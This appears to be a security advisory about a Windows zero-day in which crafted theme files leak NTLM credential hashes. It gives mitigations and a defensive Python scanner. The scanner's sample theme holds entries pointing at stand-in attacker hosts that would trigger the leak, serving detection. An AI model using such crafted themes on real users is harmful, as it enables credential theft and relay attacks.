Windows Zero-Day Vulnerability: Credential Theft Across Windows Versions

Overview

A critical zero-day vulnerability affecting all supported versions of Windows, from Windows 7 through Windows 11, and Windows Server 2008 R2 onwards, has been discovered. This flaw allows attackers to steal NTLM (NT LAN Manager) credentials by exploiting maliciously crafted Windows Theme files. By leveraging this vulnerability, attackers can intercept sensitive credentials with minimal user interaction.

How the Vulnerability Works

The exploit involves Windows Theme files that include references to external network paths. When a user previews or interacts with these files, Windows automatically sends NTLM authentication requests to the specified external server. These authentication requests, containing hashed credentials, can be intercepted and used in pass-the-hash attacks or relayed to gain unauthorized access to systems.

Impacted Systems

This vulnerability impacts:

  • All desktop versions of Windows, from Windows 7 through Windows 11 (including Windows 11 24H2).
  • Windows Server versions, starting from 2008 R2 and onward.

Mitigation and Protection

Microsoft has not yet released an official patch for this vulnerability. However, temporary fixes and third-party solutions are available to mitigate the risk:

  • ACROS Security’s Micropatch: This patch prevents NTLM credential leaks by identifying and blocking malicious network paths in theme files.
  • Group Policy Settings: Disable NTLM authentication where possible and enforce modern authentication protocols like Kerberos.
  • Antivirus and Monitoring Tools: Ensure that antivirus software is updated and actively monitoring for malicious theme files.
  • User Education: Educate users to avoid downloading or interacting with untrusted Windows theme files.
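As an added illustration (not code from the original post or from any of the vendors named above), a small Python scanner that flags the remote path references described in "How the Vulnerability Works" inside a .theme file, the kind of check a defender could run on downloaded themes before anyone previews them. The sample theme, its host names and the trusted-host allowlist are constructed for this example; treating both UNC paths and file:// URLs as remote references is an assumption of the example.

```python
import re

# UNC paths (\\host\share) and file:// URLs are both treated as remote references here
# (an assumption of this example); the host name is captured for the report.
REMOTE_REF = re.compile(r"(?:\\\\|file://+)([A-Za-z0-9._-]+)", re.IGNORECASE)

# Constructed sample theme (not a real file): one local wallpaper, one remote
# slideshow folder and one remote visual style. Hosts are made-up example values.
SAMPLE_THEME = r"""
; constructed sample, not a real theme
[Theme]
DisplayName=Quarterly Report
[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
[Slideshow]
ImagesRootPath=\\203.0.113.7\themes\slides
[VisualStyles]
Path=file://attacker.example/share/aero.msstyles
[MasterThemeSelector]
MTSM=DABJDKT
"""

def parse_theme(text):
    """Minimal INI parser; tolerates comment lines, duplicate keys and lines without '='."""
    sections, current = {}, ""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        key, sep, value = line.partition("=")
        if sep:
            sections.setdefault(current, {})[key.strip()] = value.strip()
    return sections

def find_remote_refs(text, trusted_hosts=()):
    """Return (section, key, host) for every entry that points at a host not on the allowlist."""
    trusted = {h.lower() for h in trusted_hosts}
    hits = []
    for section, entries in parse_theme(text).items():
        for key, value in entries.items():
            for m in REMOTE_REF.finditer(value):
                host = m.group(1).lower()
                if host not in trusted:
                    hits.append((section, key, host))
    return hits
```

In practice the same check would be run over every .theme file in a download or mail-attachment quarantine folder; any hit outside the allowlist is a file that should not be opened or previewed.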

Conclusion

This zero-day vulnerability highlights the ongoing risk posed by legacy authentication protocols like NTLM. Until an official patch is released, organizations and users must adopt mitigation strategies to safeguard their systems and credentials. Keeping systems updated and applying temporary patches can significantly reduce exposure to this exploit.
